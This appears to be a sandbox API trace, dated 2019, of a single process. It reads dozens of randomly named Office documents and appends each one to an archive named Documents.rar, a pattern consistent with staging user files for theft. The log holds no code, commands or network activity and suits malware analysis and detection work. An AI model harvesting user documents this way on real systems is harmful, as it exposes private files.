File Read filename = 1dt_j0rkw.xlsx, size = 1048576, size_out = 63284 True 1
Fn
Data
File Read filename = 1dt_j0rkw.xlsx, size = 985292, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908744 True 1
Fn
System Get Time type = Performance Ctr, time = 14323568552 True 1
Fn
System Get Time type = Ticks, time = 10908744 True 4
Fn
System Get Time type = Performance Ctr, time = 14324513009 True 1
Fn
System Get Time type = Ticks, time = 10908744 True 3
Fn
File Write filename = Documents.rar, size = 63408 True 1
Fn
Data
File Write filename = Documents.rar, size = 98 True 1
Fn
Data
File Create filename = 3gZT0e1Jc7KRhrNwc8F.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908759 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14325008851 True 1
Fn
File Read filename = 3gZT0e1Jc7KRhrNwc8F.xlsx, size = 1048576, size_out = 6200 True 1
Fn
Data
File Read filename = 3gZT0e1Jc7KRhrNwc8F.xlsx, size = 1042376, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 1
Fn
System Get Time type = Performance Ctr, time = 14325238312 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 4
Fn
System Get Time type = Performance Ctr, time = 14325384927 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 3
Fn
File Write filename = Documents.rar, size = 6240 True 1
Fn
Data
File Write filename = Documents.rar, size = 106 True 1
Fn
Data
File Create filename = 6_vMe3CazzKO.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908759 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14325763207 True 1
Fn
File Read filename = 6_vMe3CazzKO.docx, size = 1048576, size_out = 6089 True 1
Fn
Data
File Read filename = 6_vMe3CazzKO.docx, size = 1042487, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 1
Fn
System Get Time type = Performance Ctr, time = 14325867911 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 4
Fn
System Get Time type = Performance Ctr, time = 14326007329 True 1
Fn
System Get Time type = Ticks, time = 10908759 True 3
Fn
File Write filename = Documents.rar, size = 6144 True 1
Fn
Data
File Write filename = Documents.rar, size = 99 True 1
Fn
Data
File Create filename = 9klODxiFKz0-WlOc t7.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908775 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14326312529 True 1
Fn
File Read filename = 9klODxiFKz0-WlOc t7.xlsx, size = 1048576, size_out = 7995 True 1
Fn
Data
File Read filename = 9klODxiFKz0-WlOc t7.xlsx, size = 1040581, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 1
Fn
System Get Time type = Performance Ctr, time = 14326410782 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 4
Fn
System Get Time type = Performance Ctr, time = 14326561931 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 3
Fn
File Write filename = Documents.rar, size = 8048 True 1
Fn
Data
File Write filename = Documents.rar, size = 108 True 1
Fn
Data
File Create filename = AE1NPe45_G.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908775 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14326811152 True 1
Fn
File Read filename = AE1NPe45_G.xlsx, size = 1048576, size_out = 82290 True 1
Fn
Data
File Read filename = AE1NPe45_G.xlsx, size = 966286, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 1
Fn
System Get Time type = Performance Ctr, time = 14326951642 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 4
Fn
System Get Time type = Performance Ctr, time = 14327623325 True 1
Fn
System Get Time type = Ticks, time = 10908775 True 3
Fn
File Write filename = Documents.rar, size = 82496 True 1
Fn
Data
File Write filename = Documents.rar, size = 99 True 1
Fn
Data
File Create filename = atEaVS6T.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908791 True 1
Fn
System Get Time type = Ticks, time = 10908791 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14328186110 True 1
Fn
File Read filename = atEaVS6T.pptx, size = 1048576, size_out = 85875 True 1
Fn
Data
File Read filename = atEaVS6T.pptx, size = 962701, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908791 True 1
Fn
System Get Time type = Performance Ctr, time = 14328515181 True 1
Fn
System Get Time type = Ticks, time = 10908791 True 4
Fn
System Get Time type = Performance Ctr, time = 14329205879 True 1
Fn
System Get Time type = Ticks, time = 10908791 True 3
Fn
File Write filename = Documents.rar, size = 86080 True 1
Fn
Data
File Write filename = Documents.rar, size = 97 True 1
Fn
Data
File Create filename = AtQu0 xTj.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908806 True 1
Fn
System Get Time type = Ticks, time = 10908806 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14329806706 True 1
Fn
File Read filename = AtQu0 xTj.docx, size = 1048576, size_out = 12259 True 1
Fn
Data
File Read filename = AtQu0 xTj.docx, size = 1036317, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908806 True 1
Fn
System Get Time type = Performance Ctr, time = 14330108118 True 1
Fn
System Get Time type = Ticks, time = 10908806 True 4
Fn
System Get Time type = Performance Ctr, time = 14330322194 True 1
Fn
System Get Time type = Ticks, time = 10908806 True 3
Fn
File Write filename = Documents.rar, size = 12304 True 1
Fn
Data
File Write filename = Documents.rar, size = 98 True 1
Fn
Data
File Create filename = aZCuN2.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908806 True 1
Fn
System Get Time type = Ticks, time = 10908806 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14330707197 True 1
Fn
File Read filename = aZCuN2.pptx, size = 1048576, size_out = 22211 True 1
Fn
Data
File Read filename = aZCuN2.pptx, size = 1026365, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 1
Fn
System Get Time type = Performance Ctr, time = 14330852620 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 4
Fn
System Get Time type = Performance Ctr, time = 14331111320 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 3
Fn
File Write filename = Documents.rar, size = 22304 True 1
Fn
Data
File Write filename = Documents.rar, size = 95 True 1
Fn
Data
File Create filename = buu1yiRA_xVu8tVc\hLAWY-nuLL.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908822 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14331451727 True 1
Fn
File Read filename = buu1yiRA_xVu8tVc\hLAWY-nuLL.pptx, size = 1048576, size_out = 74760 True 1
Fn
Data
File Read filename = buu1yiRA_xVu8tVc\hLAWY-nuLL.pptx, size = 973816, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 1
Fn
System Get Time type = Performance Ctr, time = 14331610043 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 4
Fn
System Get Time type = Performance Ctr, time = 14332238584 True 1
Fn
System Get Time type = Ticks, time = 10908822 True 3
Fn
File Write filename = Documents.rar, size = 74928 True 1
Fn
Data
File Write filename = Documents.rar, size = 116 True 1
Fn
Data
File Create filename = C8sP.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908837 True 1
Fn
System Get Time type = Ticks, time = 10908837 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14332823256 True 1
Fn
File Read filename = C8sP.docx, size = 1048576, size_out = 15090 True 1
Fn
Data
File Read filename = C8sP.docx, size = 1033486, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908837 True 1
Fn
System Get Time type = Performance Ctr, time = 14333320549 True 1
Fn
System Get Time type = Ticks, time = 10908837 True 4
Fn
System Get Time type = Performance Ctr, time = 14333522208 True 1
Fn
System Get Time type = Ticks, time = 10908837 True 3
Fn
File Write filename = Documents.rar, size = 15120 True 1
Fn
Data
File Write filename = Documents.rar, size = 93 True 1
Fn
Data
File Create filename = Da5qX9dUi.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908837 True 1
Fn
System Get Time type = Ticks, time = 10908837 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14333793610 True 1
Fn
File Read filename = Da5qX9dUi.xlsx, size = 1048576, size_out = 87246 True 1
Fn
Data
File Read filename = Da5qX9dUi.xlsx, size = 961330, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908853 True 1
Fn
System Get Time type = Performance Ctr, time = 14333998416 True 1
Fn
System Get Time type = Ticks, time = 10908853 True 4
Fn
System Get Time type = Performance Ctr, time = 14334716478 True 1
Fn
System Get Time type = Ticks, time = 10908853 True 3
Fn
File Write filename = Documents.rar, size = 87440 True 1
Fn
Data
File Write filename = Documents.rar, size = 98 True 1
Fn
Data
File Create filename = desktop.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908853 True 1
Fn
System Get Time type = Ticks, time = 10908853 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14335194500 True 1
Fn
File Read filename = desktop.ini, size = 1048576, size_out = 402 True 1
Fn
Data
File Read filename = desktop.ini, size = 1048174, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908853 True 1
Fn
System Get Time type = Performance Ctr, time = 14335493837 True 1
Fn
System Get Time type = Ticks, time = 10908853 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 3
Fn
System Get Time type = Performance Ctr, time = 14335648009 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 3
Fn
File Write filename = Documents.rar, size = 192 True 1
Fn
Data
File Write filename = Documents.rar, size = 93 True 1
Fn
Data
File Create filename = dPdybr639pwn.odp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908869 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14336039658 True 1
Fn
File Read filename = dPdybr639pwn.odp, size = 1048576, size_out = 24431 True 1
Fn
Data
File Read filename = dPdybr639pwn.odp, size = 1024145, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 1
Fn
System Get Time type = Performance Ctr, time = 14336140208 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 4
Fn
System Get Time type = Performance Ctr, time = 14336402372 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 3
Fn
File Write filename = Documents.rar, size = 24512 True 1
Fn
Data
File Write filename = Documents.rar, size = 100 True 1
Fn
Data
File Create filename = e8 DbP8IuWCbGEcy.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908869 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14336755340 True 1
Fn
File Read filename = e8 DbP8IuWCbGEcy.docx, size = 1048576, size_out = 74690 True 1
Fn
Data
File Read filename = e8 DbP8IuWCbGEcy.docx, size = 973886, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 1
Fn
System Get Time type = Performance Ctr, time = 14336918258 True 1
Fn
System Get Time type = Ticks, time = 10908869 True 3
Fn
System Get Time type = Ticks, time = 10908884 True 1
Fn
System Get Time type = Performance Ctr, time = 14337531799 True 1
Fn
System Get Time type = Ticks, time = 10908884 True 3
Fn
File Write filename = Documents.rar, size = 74864 True 1
Fn
Data
File Write filename = Documents.rar, size = 105 True 1
Fn
Data
File Create filename = F-YPFV_qYj4bfRfXw9yB.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908884 True 1
Fn
System Get Time type = Ticks, time = 10908884 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14338027335 True 1
Fn
File Read filename = F-YPFV_qYj4bfRfXw9yB.docx, size = 1048576, size_out = 61040 True 1
Fn
Data
File Read filename = F-YPFV_qYj4bfRfXw9yB.docx, size = 987536, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908884 True 1
Fn
System Get Time type = Performance Ctr, time = 14338310728 True 1
Fn
System Get Time type = Ticks, time = 10908884 True 4
Fn
System Get Time type = Performance Ctr, time = 14338863003 True 1
Fn
System Get Time type = Ticks, time = 10908900 True 3
Fn
File Write filename = Documents.rar, size = 61168 True 1
Fn
Data
File Write filename = Documents.rar, size = 109 True 1
Fn
Data
File Create filename = f7H1LR6Kr4.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908900 True 1
Fn
System Get Time type = Ticks, time = 10908900 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14339367552 True 1
Fn
File Read filename = f7H1LR6Kr4.xlsx, size = 1048576, size_out = 93702 True 1
Fn
Data
File Read filename = f7H1LR6Kr4.xlsx, size = 954874, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908900 True 1
Fn
System Get Time type = Performance Ctr, time = 14339633629 True 1
Fn
System Get Time type = Ticks, time = 10908900 True 3
Fn
System Get Time type = Ticks, time = 10908915 True 1
Fn
System Get Time type = Performance Ctr, time = 14340398389 True 1
Fn
System Get Time type = Ticks, time = 10908915 True 3
Fn
File Write filename = Documents.rar, size = 93888 True 1
Fn
Data
File Write filename = Documents.rar, size = 99 True 1
Fn
Data
File Create filename = F_g z.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908915 True 1
Fn
System Get Time type = Ticks, time = 10908915 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14340904122 True 1
Fn
File Read filename = F_g z.xlsx, size = 1048576, size_out = 40566 True 1
Fn
Data
File Read filename = F_g z.xlsx, size = 1008010, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908915 True 1
Fn
System Get Time type = Performance Ctr, time = 14341251916 True 1
Fn
System Get Time type = Ticks, time = 10908915 True 4
Fn
System Get Time type = Performance Ctr, time = 14341784608 True 1
Fn
System Get Time type = Ticks, time = 10908931 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Documents.rar, size = 40688 True 1
Fn
Data
File Write filename = Documents.rar, size = 94 True 1
Fn
Data
File Create filename = G8MmJscBgVAAB6EEG8d0.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908931 True 1
Fn
System Get Time type = Ticks, time = 10908931 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14342331899 True 1
Fn
File Read filename = G8MmJscBgVAAB6EEG8d0.docx, size = 1048576, size_out = 22507 True 1
Fn
Data
File Read filename = G8MmJscBgVAAB6EEG8d0.docx, size = 1026069, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908931 True 1
Fn
System Get Time type = Performance Ctr, time = 14342507676 True 1
Fn
System Get Time type = Ticks, time = 10908931 True 4
Fn
System Get Time type = Performance Ctr, time = 14342753010 True 1
Fn
System Get Time type = Ticks, time = 10908931 True 3
Fn
File Write filename = Documents.rar, size = 22592 True 1
Fn
Data
File Write filename = Documents.rar, size = 109 True 1
Fn
Data
File Create filename = GIwIhnYq\01ty5ZVjiFX.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908947 True 1
Fn
System Get Time type = Ticks, time = 10908947 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14343409518 True 1
Fn
File Read filename = GIwIhnYq\01ty5ZVjiFX.xlsx, size = 1048576, size_out = 59162 True 1
Fn
Data
File Read filename = GIwIhnYq\01ty5ZVjiFX.xlsx, size = 989414, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908947 True 1
Fn
System Get Time type = Performance Ctr, time = 14343562588 True 1
Fn
System Get Time type = Ticks, time = 10908947 True 4
Fn
System Get Time type = Performance Ctr, time = 14344038731 True 1
Fn
System Get Time type = Ticks, time = 10908947 True 3
Fn
File Write filename = Documents.rar, size = 59296 True 1
Fn
Data
File Write filename = Documents.rar, size = 109 True 1
Fn
Data
File Create filename = GIwIhnYq\4aTOLAatL.rtf, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908947 True 1
Fn
System Get Time type = Ticks, time = 10908947 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14344801174 True 1
Fn
File Read filename = GIwIhnYq\4aTOLAatL.rtf, size = 1048576, size_out = 100922 True 1
Fn
Data
File Read filename = GIwIhnYq\4aTOLAatL.rtf, size = 947654, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908962 True 1
Fn
System Get Time type = Performance Ctr, time = 14345092208 True 1
Fn
System Get Time type = Ticks, time = 10908962 True 4
Fn
System Get Time type = Performance Ctr, time = 14345949860 True 1
Fn
System Get Time type = Ticks, time = 10908962 True 3
Fn
File Write filename = Documents.rar, size = 85408 True 1
Fn
Data
File Write filename = Documents.rar, size = 106 True 1
Fn
Data
File Create filename = GIwIhnYq\gJxsA3QDXPNzu_.pps, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908962 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14346517970 True 1
Fn
File Read filename = GIwIhnYq\gJxsA3QDXPNzu_.pps, size = 1048576, size_out = 71757 True 1
Fn
Data
File Read filename = GIwIhnYq\gJxsA3QDXPNzu_.pps, size = 976819, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 1
Fn
System Get Time type = Performance Ctr, time = 14346921669 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 4
Fn
System Get Time type = Performance Ctr, time = 14347922753 True 1
Fn
System Get Time type = Ticks, time = 10908978 True 3
Fn
File Write filename = Documents.rar, size = 71904 True 1
Fn
Data
File Write filename = Documents.rar, size = 111 True 1
Fn
Data
File Create filename = HaxwmHj 0CtV7r4.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14348457753 True 1
Fn
File Read filename = HaxwmHj 0CtV7r4.docx, size = 1048576, size_out = 33859 True 1
Fn
Data
File Read filename = HaxwmHj 0CtV7r4.docx, size = 1014717, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = Performance Ctr, time = 14348734451 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 4
Fn
System Get Time type = Performance Ctr, time = 14349049955 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 3
Fn
File Write filename = Documents.rar, size = 33984 True 1
Fn
Data
File Write filename = Documents.rar, size = 104 True 1
Fn
Data
File Create filename = IdJZzMH4BMOKYzj.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = Ticks, time = 10908993 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14349439063 True 1
Fn
File Read filename = IdJZzMH4BMOKYzj.docx, size = 1048576, size_out = 75909 True 1
Fn
Data
File Read filename = IdJZzMH4BMOKYzj.docx, size = 972667, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = Performance Ctr, time = 14349633996 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 4
Fn
System Get Time type = Performance Ctr, time = 14350254329 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 3
Fn
File Write filename = Documents.rar, size = 76064 True 1
Fn
Data
File Write filename = Documents.rar, size = 104 True 1
Fn
Data
File Create filename = Jrdm wCY_KpB5kAazb.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14350748276 True 1
Fn
File Read filename = Jrdm wCY_KpB5kAazb.docx, size = 1048576, size_out = 86062 True 1
Fn
Data
File Read filename = Jrdm wCY_KpB5kAazb.docx, size = 962514, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909009 True 1
Fn
System Get Time type = Performance Ctr, time = 14351151130 True 1
Fn
System Get Time type = Ticks, time = 10909025 True 4
Fn
System Get Time type = Performance Ctr, time = 14351875738 True 1
Fn
System Get Time type = Ticks, time = 10909025 True 3
Fn
File Write filename = Documents.rar, size = 86272 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = jWTOiGMc8-CGVj37-J.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909025 True 1
Fn
System Get Time type = Ticks, time = 10909025 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14352358362 True 1
Fn
File Read filename = jWTOiGMc8-CGVj37-J.xlsx, size = 1048576, size_out = 41390 True 1
Fn
Data
File Read filename = jWTOiGMc8-CGVj37-J.xlsx, size = 1007186, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = Performance Ctr, time = 14352796106 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 4
Fn
System Get Time type = Performance Ctr, time = 14353229153 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 3
Fn
File Write filename = Documents.rar, size = 41504 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = K3zCHl_.xlsx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14353630916 True 1
Fn
File Read filename = K3zCHl_.xlsx, size = 1048576, size_out = 31343 True 1
Fn
Data
File Read filename = K3zCHl_.xlsx, size = 1017233, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 1
Fn
System Get Time type = Performance Ctr, time = 14353810243 True 1
Fn
System Get Time type = Ticks, time = 10909040 True 4
Fn
System Get Time type = Performance Ctr, time = 14354393245 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 3
Fn
File Write filename = Documents.rar, size = 31408 True 1
Fn
Data
File Write filename = Documents.rar, size = 96 True 1
Fn
Data
File Create filename = kSD3eNYHYfeDhhgpl4.pptx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909056 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14354916932 True 1
Fn
File Read filename = kSD3eNYHYfeDhhgpl4.pptx, size = 1048576, size_out = 84090 True 1
Fn
Data
File Read filename = kSD3eNYHYfeDhhgpl4.pptx, size = 964486, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 1
Fn
System Get Time type = Performance Ctr, time = 14355125992 True 1
Fn
System Get Time type = Ticks, time = 10909056 True 3
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = Performance Ctr, time = 14355850379 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 3
Fn
File Write filename = Documents.rar, size = 84304 True 1
Fn
Data
File Write filename = Documents.rar, size = 107 True 1
Fn
Data
File Create filename = KZD3FfQJWWhay.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14356399911 True 1
Fn
File Read filename = KZD3FfQJWWhay.docx, size = 1048576, size_out = 72483 True 1
Fn
Data
File Read filename = KZD3FfQJWWhay.docx, size = 976093, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 1
Fn
System Get Time type = Performance Ctr, time = 14356723355 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 4
Fn
System Get Time type = Performance Ctr, time = 14357314587 True 1
Fn
System Get Time type = Ticks, time = 10909071 True 3
Fn
File Write filename = Documents.rar, size = 72656 True 1
Fn
Data
File Write filename = Documents.rar, size = 102 True 1
Fn
Data
File Create filename = L4AvX7khKXUu5.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10909087 True 1
Fn
System Get Time type = Ticks, time = 10909087 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:29 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 14357835393 True 1
Fn
File Read filename = L4AvX7khKXUu5.docx, size = 1048576, size_out = 34956 True 1
Fn
Data
File Read filename = L4AvX7khKXUu5.docx, size = 1013620, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10909087 True 1
Fn
System Get Time type = Performance Ctr, time = 14358288190 True 1
Fn
System Get Time type = Ticks, time = 10909087 True 3
Fn
System Get Time type = Ticks, time = 10909103 True 1
Fn
System Get Time type = Performance Ctr, time = 14359069542 True 1
Fn
System Get Time type = Ticks, time = 10909103 True 3
Fn
File Write filename = Documents.rar, size = 35072 True 1
Fn
Data
File Write filename = Documents.rar, size = 102 True 1
Fn
Data
